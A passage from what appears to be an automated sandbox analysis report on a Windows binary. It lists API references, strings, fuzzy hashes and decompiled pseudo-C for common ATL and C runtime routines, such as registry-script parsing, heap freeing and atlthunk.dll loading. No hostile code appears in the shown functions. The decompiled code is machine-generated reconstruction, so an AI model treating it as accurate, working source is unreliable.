0x00cb3ede
0x00000000
0x00000000
0x00cb3ef6
0x00cb3ef8
0x00cb3efa
0x00cb3f09
0x00cb3f0a
0x00cb3f11
0x00cb3f13
0x00cb3f15
0x00000000
0x00000000
0x00000000
0x00cb3f15
0x00cb3efc
0x00cb3f03
0x00000000
0x00000000
0x00000000
0x00cb3f03
0x00cb3eb7
0x00cb3dd8
0x00cb3deb
0x00cb3df0
0x00cb3df2
0x00cb3e22
0x00cb3e2a
0x00cb3e2c
0x00cb3e2e
0x00000000
0x00000000
0x00cb3e34
0x00cb3e37
0x00000000
0x00000000
0x00cb3e4e
0x00cb3c55
0x00cb3c57
0x00000000
0x00000000
0x00000000
0x00cb3c5d
0x00cb3e01
0x00cb3e06
0x00cb3e08
0x00000000
0x00000000
0x00cb3e0a
0x00cb3e15
0x00cb3e1a
0x00cb3e1c
0x00000000
0x00000000
0x00000000
0x00cb3e1c
0x00cb3cbb
0x00cb3cbd
0x00cb3cbf
0x00000000
0x00000000
0x00cb3ccd
0x00cb3ccf
0x00cb3cd1
0x00000000
0x00000000
0x00cb3cd7
0x00cb3cda
0x00000000
0x00000000
0x00cb3ce0
0x00cb3ce4
0x00cb3d48
0x00cb3d4c
0x00cb3db5
0x00cb3db8
0x00000000
0x00cb3db8
0x00cb3d4e
0x00cb3d55
0x00000000
0x00000000
0x00cb3d6b
0x00cb3d71
0x00cb3d77
0x00cb3d7d
0x00cb3d82
0x00cb3d84
0x00cb4093
0x00cb4095
0x00cb409a
0x00000000
0x00cb409a
0x00cb3d97
0x00cb3d9d
0x00cb3d9f
0x00cb3daa
0x00cb3db0
0x00000000
0x00cb3db0
0x00cb3da1
0x00cb3da4
0x00000000
0x00000000
0x00000000
0x00cb3da4
0x00cb3ceb
0x00cb3cf4
0x00cb3cfb
0x00cb3d02
0x00cb3d1c
0x00cb3d1e
0x00cb3d26
0x00cb3d2c
0x00cb3d32
0x00cb3d38
0x00cb3d3a
0x00000000
0x00000000
0x00cb3d40
0x00000000
0x00cb3d40
0x00cb3c84
0x00cb3c8f
0x00cb3c91
0x00cb3c93
0x00000000
0x00000000
0x00000000
0x00cb3c93
0x00cb3ba8
0x00000000
0x00cb3b71
0x00cb406a
0x00cb4070
0x00cb407a
0x00cb4088
0x00cb4090
0x00cb4090

APIs

Part of subcall function 00CB314F: CharNextA.USER32 ref: 00CB3175
Part of subcall function 00CB314F: CharNextA.USER32 ref: 00CB31E9

lstrcmpiA.KERNEL32(?,Delete,BB5E653B,?,00000000,00000000,0000007B,00CFCB9B,000000FF,?,00CB3ACF,0000007B,00000000,00000000,00000000), ref: 00CB3B89
lstrcmpiA.KERNEL32(?,ForceRemove,?,00000000,00000000,0000007B,00CFCB9B,000000FF,?,00CB3ACF,0000007B,00000000,00000000,00000000,?,?), ref: 00CB3BA0
lstrcmpiA.KERNEL32(?,NoRemove,?,00000000,00000000,0000007B,00CFCB9B,000000FF,?,00CB3ACF,0000007B,00000000,00000000,00000000,?,?), ref: 00CB3C77
lstrcmpiA.KERNEL32(?,Val,?,00000000,00000000,0000007B,00CFCB9B,000000FF,?,00CB3ACF,0000007B,00000000,00000000,00000000,?,?), ref: 00CB3C9F
RegDeleteValueA.ADVAPI32(?,?), ref: 00CB3D97
__cftof.LIBCMT ref: 00CB3E9D
_strlen.LIBCMT ref: 00CB3ED5
_strlen.LIBCMT ref: 00CB4025

Strings

NoRemove, xrefs: 00CB3C71
Val, xrefs: 00CB3C99
Delete, xrefs: 00CB3B7C
ForceRemove, xrefs: 00CB3B91

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpi$CharNext_strlen$DeleteValue__cftof
String ID: Delete$ForceRemove$NoRemove$Val
API String ID: 1988547173-1781481701
Opcode ID: ee380b8297aefc3a78893254402f313f550faaf62960a6f6a710cfcbb827b1d8
Instruction ID: 871e0dc341dfa43736b2c0910d4436977a0bdaabe218ad17bea8ceab3d7ebc12
Opcode Fuzzy Hash: ee380b8297aefc3a78893254402f313f550faaf62960a6f6a710cfcbb827b1d8
Instruction Fuzzy Hash: 33E19431D002699BDF39AF648C45BEEB7B4AF55B10F0001A9FA16A7241EB349F84DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CECE13, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CECE13(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xd0f740) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00CE46CC(_t46);
							E00CEBCF6( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00CE46CC(_t47);
							E00CEC1E5( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00CE46CC( *((intOrPtr*)(_t74 + 0x7c)));
						E00CE46CC( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00CE46CC( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00CE46CC( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00CE46CC( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00CE46CC( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00CECF86( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xd0f1d8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00CE46CC(_t31);
							E00CE46CC( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00CE46CC(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00CE46CC(_t74);
			}

0x00cece1b
0x00cece1f
0x00cece27
0x00cece30
0x00cece35
0x00cece3c
0x00cece44
0x00cece4c
0x00cece57
0x00cece5d
0x00cece5e
0x00cece66
0x00cece6e
0x00cece79
0x00cece7f
0x00cece83
0x00cece8e
0x00cece94
0x00cece35
0x00cece95
0x00cece9d
0x00ceceb0
0x00cecec3
0x00ceced1
0x00cecedc
0x00cecee1
0x00ceceea
0x00cecef2
0x00cecef3
0x00cecef9
0x00cecefc
0x00ceceff
0x00cecf06
0x00cecf08
0x00cecf0c
0x00cecf14
0x00cecf1b
0x00cecf21
0x00cecf22
0x00cecf22
0x00cecf29
0x00cecf2b
0x00cecf30
0x00cecf38
0x00cecf3d
0x00cecf3e
0x00cecf3e
0x00cecf41
0x00cecf44
0x00cecf47
0x00cecf4a
0x00cecf4a
0x00cecf5c

APIs

___free_lconv_mon.LIBCMT ref: 00CECE57

Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBD13
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBD25
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBD37
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBD49
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBD5B
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBD6D
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBD7F
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBD91
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBDA3
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBDB5
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBDC7
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBDD9
Part of subcall function 00CEBCF6: _free.LIBCMT ref: 00CEBDEB

_free.LIBCMT ref: 00CECE4C

Part of subcall function 00CE46CC: HeapFree.KERNEL32(00000000,00000000,?,00CEC574,?,00000000,?,?,?,00CEC896,?,00000007,?,?,00CECFAC,?), ref: 00CE46E2
Part of subcall function 00CE46CC: GetLastError.KERNEL32(?,?,00CEC574,?,00000000,?,?,?,00CEC896,?,00000007,?,?,00CECFAC,?,?), ref: 00CE46F4

_free.LIBCMT ref: 00CECE6E
_free.LIBCMT ref: 00CECE83
_free.LIBCMT ref: 00CECE8E
_free.LIBCMT ref: 00CECEB0
_free.LIBCMT ref: 00CECEC3
_free.LIBCMT ref: 00CECED1
_free.LIBCMT ref: 00CECEDC
_free.LIBCMT ref: 00CECF14
_free.LIBCMT ref: 00CECF1B
_free.LIBCMT ref: 00CECF38
_free.LIBCMT ref: 00CECF50

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 1ba3135f8fea7792868a0345eb21690f901f91706460f7d15056fcd3d47e071b
Instruction ID: 04d7f1731abaa42848b16d832fab9bcd415b01a6f03a1985482505c2f162c2da
Opcode Fuzzy Hash: 1ba3135f8fea7792868a0345eb21690f901f91706460f7d15056fcd3d47e071b
Instruction Fuzzy Hash: FD319C726003819FEB24ABBAD885B5B77E9EF01310F184529F468D7162DF35EE41D724

Uniqueness

Uniqueness Score: -1.00%

Function 00CB77C4, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00CB77C4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				struct HMETAFILE__* _v28;
				char _v32;
				int _v36;
				int _v40;
				void* _v44;
				signed int _v64;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				struct HDC__* _v84;
				CHAR* _v88;
				CHAR* _v92;
				signed int _v96;
				intOrPtr _v100;
				char _v104;
				signed int _t70;
				int _t74;
				char* _t77;
				struct HDC__* _t81;
				struct HMETAFILE__* _t89;
				void* _t91;
				struct HWND__** _t95;
				int _t109;
				int _t112;
				intOrPtr* _t116;
				intOrPtr* _t117;
				intOrPtr* _t128;
				intOrPtr* _t131;
				void* _t132;
				signed int _t137;

				_t135 = _t137;
				_t70 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t70 ^ _t137;
				_t128 = _a8;
				_t131 = __ecx;
				if(_t128 != 0) {
					E00CC1E00(_t128, _t128, 0, 0xc);
					if(( *(_a4 + 0x10) & 0x00000020) != 0) {
						if(( *(_t131 + 0x44) & 0x00001000) == 0) {
							_t109 =  *((intOrPtr*)(_t131 + 0x24));
							_t74 =  *((intOrPtr*)(_t131 + 0x28));
						} else {
							_t109 =  *((intOrPtr*)(_t131 + 0x1c));
							_t74 =  *((intOrPtr*)(_t131 + 0x20));
						}
						_v28 = _t74;
						_v36 = _t74;
						_v32 = _t109;
						if(( *(_t131 + 0x44) & 0x00002000) != 0) {
							_t112 = _t109;
						} else {
							E00CB6476(_t109,  &_v32,  &_v44, _t128, _t131);
							_t74 = _v40;
							_t112 = _v44;
						}
						_v12 = _t74;
						_v24 = 0;
						_v20 = 0;
						_v16 = _t112;
						E00CC1E00(_t128,  &_v104, 0, 0x3c);
						_v96 = _v96 | 0xffffffff;
						_t77 =  &_v24;
						_v80 = _t77;
						_v76 = _t77;
						_v104 = 0x3c;
						_v100 = 1;
						_v92 = 0;
						_v88 = 0;
						_v72 = 1;
						_v64 =  *(_t131 + 0x44) >> 0x0000000d & 1;
						_t81 = CreateMetaFileA(0);
						_v84 = _t81;
						SaveDC(_t81);
						SetWindowOrgEx(_v84, 0, 0, 0);
						SetWindowExtEx(_v84, _v16, _v12, 0);
						_t116 = _t131;
						 *((intOrPtr*)( *_t131 + 0xc))( &_v104);
						RestoreDC(_v84, 0xffffffff);
						_t89 = CloseMetaFile(_v84);
						_v28 = _t89;
						if(_t89 != 0) {
							_t132 = GlobalAlloc(0x2002, 0x10);
							if(_t132 != 0) {
								_t91 = GlobalLock(_t132);
								if(_t91 == 0) {
									_push(0x80004005);
									L00CB1410(0);
									asm("int3");
									if(( *(_t116 + 0x44) & 0x00000004) == 0) {
										E00CB65DD(_t116, _t116, _t116);
									} else {
										_t95 =  *(_t116 + 0x3c);
										if( *_t95 == 0) {
											if(( *(_t116 + 0x44) & 0x00000002) != 0) {
												_t117 =  *((intOrPtr*)(_t116 + 4));
												if(_t117 != 0) {
													 *((intOrPtr*)( *_t117 + 0x64))(_t117, 0, 1);
												}
											}
										} else {
											InvalidateRect( *_t95, 0, 1);
										}
									}
									return 0;
								} else {
									 *((intOrPtr*)(_t91 + 0xc)) = _v28;
									 *_t91 = 8;
									 *((intOrPtr*)(_t91 + 4)) = _t109;
									 *((intOrPtr*)(_t91 + 8)) = _v36;
									GlobalUnlock(_t132);
									 *(_t128 + 8) =  *(_t128 + 8) & 0x00000000;
									 *_t128 = 0x20;
									 *(_t128 + 4) = _t132;
									goto L16;
								}
							} else {
								DeleteMetaFile(_v28);
								goto L16;
							}
						} else {
							L16:
							goto L17;
						}
					} else {
						goto L17;
					}
				} else {
					L17:
					return E00CBDC11(_v8 ^ _t135);
				}
			}

0x00cb77c5
0x00cb77ca
0x00cb77d1
0x00cb77d6
0x00cb77d9
0x00cb77dd
0x00cb77ee
0x00cb77fd
0x00cb7811
0x00cb781b
0x00cb781e
0x00cb7813
0x00cb7813
0x00cb7816
0x00cb7816
0x00cb7828
0x00cb782b
0x00cb782e
0x00cb7831
0x00cb7846
0x00cb7833
0x00cb7839
0x00cb783e
0x00cb7841
0x00cb7841
0x00cb784a
0x00cb7853
0x00cb7857
0x00cb785a
0x00cb785d
0x00cb7862
0x00cb7866
0x00cb7869
0x00cb786f
0x00cb787f
0x00cb7887
0x00cb788a
0x00cb788d
0x00cb7890
0x00cb7893
0x00cb7896
0x00cb789d
0x00cb78a0
0x00cb78ae
0x00cb78bf
0x00cb78cb
0x00cb78cd
0x00cb78d5
0x00cb78de
0x00cb78e4
0x00cb78e9
0x00cb78ff
0x00cb7903
0x00cb7917
0x00cb791f
0x00cb795d
0x00cb7962
0x00cb7967
0x00cb796c
0x00cb799f
0x00cb796e
0x00cb796e
0x00cb7974
0x00cb7988
0x00cb798a
0x00cb798f
0x00cb7998
0x00cb7998
0x00cb798f
0x00cb7976
0x00cb797c
0x00cb797c
0x00cb7974
0x00cb79a6
0x00cb7921
0x00cb7924
0x00cb792b
0x00cb7931
0x00cb7934
0x00cb7937
0x00cb793d
0x00cb7943
0x00cb7949
0x00000000
0x00cb7949
0x00cb7905
0x00cb7909
0x00000000
0x00cb790f
0x00cb78eb
0x00cb794c
0x00000000
0x00cb794c
0x00cb77ff
0x00000000
0x00cb77ff
0x00cb77df
0x00cb794d
0x00cb795a
0x00cb795a

Strings

<, xrefs: 00CB787F

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorException@8LastThrow
String ID: <
API String ID: 1006195485-4251816714
Opcode ID: f0214e6186b7133c608fcbda7e53249aa3cc8d33bcb0745f2f105f9fcfa7233e
Instruction ID: 517694b88a0539bdf751904beece3126ffb78f285cd589f522d6b9c8ae160eb0
Opcode Fuzzy Hash: f0214e6186b7133c608fcbda7e53249aa3cc8d33bcb0745f2f105f9fcfa7233e
Instruction Fuzzy Hash: 2B514870D00309DFDB24DF95D849BAEBBF5FF48310F108529E91AAB2A1DB749900DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB05C, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CBB05C(void* _a4, intOrPtr* _a8) {
				void _v52;
				void _v100;
				intOrPtr _v104;
				wchar_t* _v108;
				int _t43;
				intOrPtr _t45;
				wchar_t* _t48;
				int _t50;
				void* _t63;
				intOrPtr* _t65;
				signed int _t67;
				signed int _t70;
				struct HINSTANCE__* _t73;
				struct HINSTANCE__* _t77;
				wchar_t* _t88;
				signed int _t90;
				void* _t92;

				_t92 = (_t90 & 0xfffffff8) - 0x6c;
				_t63 = _a4;
				if(_t63 == 0) {
					L8:
					_t43 = 0;
					L9:
					return _t43;
				}
				_t65 = _a8;
				if(_t65 == 0) {
					goto L8;
				}
				_t77 = 0;
				if( *(_t63 + 0x40) != 0) {
					L18:
					if( *(_t63 + 0x30) != _t77) {
						 *_t65 =  *((intOrPtr*)(_t63 + 0x34));
					}
					_t43 =  *(_t63 + 0x40);
					goto L9;
				}
				EnterCriticalSection(0xe3a454);
				if( *(_t63 + 0x40) != 0) {
					L17:
					LeaveCriticalSection(0xe3a454);
					_t65 = _a8;
					goto L18;
				}
				if( *(_t63 + 0x30) == 0) {
					_t45 =  *0xe39110; // 0xcb0000
					_t46 =  !=  ? 0 : _t45;
					 *((intOrPtr*)(_t63 + 0x1c)) = LoadCursorA( !=  ? 0 : _t45,  *(_t63 + 0x38));
					_t48 =  *(_t63 + 0x28);
					L12:
					_t73 =  *0xe3910c; // 0xcb0000
					 *(_t63 + 4) =  *(_t63 + 4) & 0xffffbfff;
					 *(_t63 + 0x14) = _t73;
					if(_t48 == 0) {
						_t88 = _t63 + 0x42;
						swprintf(_t88, 0x25, "ATL:%p", _t63);
						_t73 =  *(_t63 + 0x14);
						_t92 = _t92 + 0x10;
						 *(_t63 + 0x28) = _t88;
					}
					_t67 = 0xc;
					_t50 = GetClassInfoExA(_t73, memcpy( &_v52, _t63, _t67 << 2),  &_v52);
					 *(_t63 + 0x40) = _t50;
					if(_t50 == 0) {
						 *(_t63 + 0x40) = E00CB6216( &_v52, _t63);
					}
					_t77 = 0;
					goto L17;
				}
				_v108 =  *(_t63 + 0x28);
				_v104 =  *((intOrPtr*)(_t63 + 8));
				_v100 = 0x30;
				if(GetClassInfoExA(0,  *(_t63 + 0x30),  &_v100) != 0 || GetClassInfoExA( *0xe3910c,  *(_t63 + 0x30),  &_v100) != 0) {
					_t70 = 0xc;
					memcpy(_t63,  &_v100, _t70 << 2);
					_t92 = _t92 + 0xc;
					 *((intOrPtr*)(_t63 + 0x34)) =  *((intOrPtr*)(_t63 + 8));
					_t48 = _v108;
					 *(_t63 + 0x28) = _t48;
					 *((intOrPtr*)(_t63 + 8)) = _v104;
					goto L12;
				} else {
					LeaveCriticalSection(0xe3a454);
					goto L8;
				}
			}

0x00cbb062
0x00cbb066
0x00cbb06d
0x00cbb0e6
0x00cbb0e6
0x00cbb0e8
0x00cbb0ee
0x00cbb0ee
0x00cbb06f
0x00cbb074
0x00000000
0x00000000
0x00cbb076
0x00cbb07c
0x00cbb19a
0x00cbb19d
0x00cbb1a2
0x00cbb1a2
0x00cbb1a4
0x00000000
0x00cbb1a4
0x00cbb087
0x00cbb091
0x00cbb18c
0x00cbb191
0x00cbb197
0x00000000
0x00cbb197
0x00cbb0a0
0x00cbb110
0x00cbb11d
0x00cbb127
0x00cbb12a
0x00cbb12d
0x00cbb12d
0x00cbb133
0x00cbb13a
0x00cbb13f
0x00cbb147
0x00cbb14d
0x00cbb152
0x00cbb158
0x00cbb15b
0x00cbb15b
0x00cbb160
0x00cbb170
0x00cbb176
0x00cbb17d
0x00cbb186
0x00cbb186
0x00cbb18a
0x00000000
0x00cbb18a
0x00cbb0a5
0x00cbb0ac
0x00cbb0b8
0x00cbb0c5
0x00cbb0f1
0x00cbb0f8
0x00cbb0f8
0x00cbb101
0x00cbb104
0x00cbb108
0x00cbb10b
0x00000000
0x00cbb0db
0x00cbb0e0
0x00000000
0x00cbb0e0

APIs

EnterCriticalSection.KERNEL32(00E3A454), ref: 00CBB087
GetClassInfoExA.USER32(00000000), ref: 00CBB0C1
GetClassInfoExA.USER32(?,?), ref: 00CBB0D5
LeaveCriticalSection.KERNEL32(00E3A454), ref: 00CBB0E0
LoadCursorA.USER32 ref: 00CBB121
swprintf.LIBCMT ref: 00CBB14D
GetClassInfoExA.USER32(00CB0000,?,?), ref: 00CBB170
LeaveCriticalSection.KERNEL32(00E3A454), ref: 00CBB191

Strings

ATL:%p, xrefs: 00CBB142
0, xrefs: 00CBB0B8

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassCriticalInfoSection$Leave$CursorEnterLoadswprintf
String ID: 0$ATL:%p
API String ID: 1916026773-2453800769
Opcode ID: 1ee554264d7931bb4db4c9b5748aa69c494e0b68305b65360df88c4cd353bf7e
Instruction ID: f0264a3cb1c9b5f2c208528aed6dcbf84df4461d0d5bb4013c598b0c2602899e
Opcode Fuzzy Hash: 1ee554264d7931bb4db4c9b5748aa69c494e0b68305b65360df88c4cd353bf7e
Instruction Fuzzy Hash: 3A414871900301DFDB14DF29D888AAB3BA9FF88350F404169ED149B256E7B1DD85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CBC898, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00CBC898(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xe39104 == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E00CBC94B(_t15, "AtlThunk_AllocateData", 0xe390f4) == 0 || E00CBC94B(_t15, "AtlThunk_InitData", 0xe390f8) == 0 || E00CBC94B(_t15, "AtlThunk_DataToCode", 0xe390fc) == 0 || E00CBC94B(_t15, "AtlThunk_FreeData", 0xe39100) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xe39104 = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}

0x00cbc8a3
0x00cbc8bf
0x00cbc8c5
0x00cbc8c9
0x00cbc943
0x00cbc927
0x00cbc92c
0x00cbc92f
0x00cbc932
0x00cbc93b
0x00cbc93b
0x00cbc947
0x00cbc8a5
0x00cbc8a5
0x00cbc8aa
0x00cbc8b1
0x00cbc8b1

APIs

DecodePointer.KERNEL32(?,?,?,00CBCC63,00E390F8,?,?,?,00CB50A2,?,?,?), ref: 00CBC8AA
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00CBCC63,00E390F8,?,?,?,00CB50A2,?,?,?), ref: 00CBC8BF
DecodePointer.KERNEL32(?), ref: 00CBC93B

Strings

AtlThunk_DataToCode, xrefs: 00CBC8FE
atlthunk.dll, xrefs: 00CBC8BA
AtlThunk_AllocateData, xrefs: 00CBC8D0
AtlThunk_InitData, xrefs: 00CBC8E7
AtlThunk_FreeData, xrefs: 00CBC915

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 2800825c598b0bc45ce4834943a54fc295d4ef147850a21eb929f5b546ffe5bc
Instruction ID: 9e75d79c211b4df3c4618e65edcd27e7e1abc5b5663aba47eb4183921c62a1fb
Opcode Fuzzy Hash: 2800825c598b0bc45ce4834943a54fc295d4ef147850a21eb929f5b546ffe5bc
Instruction Fuzzy Hash: E4019271A41711BAEB316729AC8BBDE3F546F02754F044050FC45772E3EBAA8B0CD6A6

Uniqueness

Uniqueness Score: -1.00%

Function 00CBC688, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00CBC688(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xe39104 == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E00CBC94B(_t15, "AtlThunk_AllocateData", 0xe390f4) == 0 || E00CBC94B(_t15, "AtlThunk_InitData", 0xe390f8) == 0 || E00CBC94B(_t15, "AtlThunk_DataToCode", 0xe390fc) == 0 || E00CBC94B(_t15, "AtlThunk_FreeData", 0xe39100) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xe39104 = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}

0x00cbc693
0x00cbc6af
0x00cbc6b5
0x00cbc6b9
0x00cbc733
0x00cbc717
0x00cbc71c
0x00cbc71f
0x00cbc722
0x00cbc72b
0x00cbc72b
0x00cbc737
0x00cbc695
0x00cbc695
0x00cbc69a
0x00cbc6a1
0x00cbc6a1

APIs

DecodePointer.KERNEL32(?,?,?,00CBCBBB,00E390FC,00000000,?,?,?,00CBADD3,?), ref: 00CBC69A
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00CBCBBB,00E390FC,00000000,?,?,?,00CBADD3,?), ref: 00CBC6AF
DecodePointer.KERNEL32(?), ref: 00CBC72B

Strings

AtlThunk_DataToCode, xrefs: 00CBC6EE
atlthunk.dll, xrefs: 00CBC6AA
AtlThunk_AllocateData, xrefs: 00CBC6C0
AtlThunk_InitData, xrefs: 00CBC6D7
AtlThunk_FreeData, xrefs: 00CBC705

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
